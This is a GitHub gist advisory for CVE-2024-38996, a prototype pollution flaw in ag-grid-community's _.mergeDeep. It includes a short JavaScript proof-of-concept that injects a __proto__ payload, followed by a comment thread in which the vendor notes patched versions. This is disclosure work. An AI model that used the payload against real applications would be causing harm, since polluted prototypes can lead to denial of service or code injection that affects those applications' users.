Skip to content

Instantly share code, notes, and snippets.

@mestrtee

mestrtee/Advisory_ag-grid.md

Last active September 5, 2024 08:33
Show Gist options
  • Save mestrtee/c1590660750744f25e86ba1bf240844b to your computer and use it in GitHub Desktop.
Save mestrtee/c1590660750744f25e86ba1bf240844b to your computer and use it in GitHub Desktop.
Download ZIP
[CVE-2024-38996] Vulnerability Advisory: Prototype Pollution in ag-grid-community, version 31.3.2
Raw
Advisory_ag-grid.md

Vulnerability type: Prototype Pollution

SVSS Score 9.8 CRITICAL

Vendor of the Package: ag-grid

SVSS Score 9.8 CRITICAL

Affected Package:

  • Product: ag-grid-community
  • Version: 31.3.2

Affected component(s):

_.mergeDeep

Attack vector(s): the attacker can modify built-in Object.prototype by calling the vulnerable function: _.mergeDeep with an argument containing a special property __proto__ to pollute the application logic that can be escalated to Denial of service, remote code execution or cross-site scripting attacks.

Description: Affected versions of this package are vulnerable to Prototype Pollution through the vulnerable function: _.mergeDeep. An attacker can alter the behavior of all objects inheriting from the affected prototype by passing arguments to the vulenrable function crafted with the built-in property: __proto__. The attack can potentially escalated to Denial of service, remote code execution or cross-site scripting attacks depends on the gadgets that may affected by the attack

Proof-of-Concept:

(async () => {
  const lib = await import('ag-grid-community');

  var victim = {}

  console.log("Before Attack: ", JSON.stringify(victim.__proto__));

  try {

  lib._.mergeDeep ({}, JSON.parse('{"__proto__":{"test":123}}'))

  } catch (e) { }

  console.log("After Attack: ", JSON.stringify(victim.__proto__));

  delete Object.prototype.test;

  })();
@AG-Zoheil
Copy link

Please note this has been addressed and resolved via patch 31.3.4 for version 31 and patch 32.0.2 for version 32.

@Otr92
Copy link

Otr92 commented Jul 17, 2024

Hi @AG-Zoheil,

Are previous versions, including the 20.2.0 version which I'm using for both ag-grid-community and ag-grid-enterprise, also vulnerable?

Thanks,

@AG-Zoheil
Copy link

We are not in a position to do a comprehensive investigation into which earlier versions of AG Grid are affected, however we can now confirm that our findings are in line with the EPSS rating of the vulnerability that stands at just 0.05% (independently verified here: https://www.cvedetails.com/cve/CVE-2024-39001/), meaning this vulnerability is extremely unlikely to be exploited.

We have provided patches for our latest version (v32) and the version it was reported in (v31).

As usual, we'd recommend upgrading the version of AG Grid in your application so you can benefit from all the improvements in functionality, stability, security, theming and performance we've made since the version you're using.

@vigneshnithyanandan
Copy link

Hi @AG-Zoheil ,

Does this vulnerability exist in all prior versions of ag-grid-community ? The latest update in advisory database: github/advisory-database@c2bcebe, says all versions of ag-grid-community up until 31.3.4 are affected.

@AG-Zoheil
Copy link

Hi @vigneshnithyanandan,

Please read my comment above regarding older versions of AG Grid.

We have provided patches for our latest version (v32) and the version it was reported in (v31) and we'd recommend upgrading to either of them.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment